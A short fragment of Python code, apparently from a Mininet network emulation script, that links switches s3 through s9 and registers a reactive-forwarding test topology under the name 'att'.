self.addLink( s3 , s4 )
self.addLink( s3 , s7 )
self.addLink( s4 , s5 )
self.addLink( s6 , s8 )
self.addLink( s6 , s7 )
self.addLink( s5 , s9 )
self.addLink( s6 , s9 )
topos = { 'att': ( lambda: ReactiveForwardingTestTopo() ) }
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.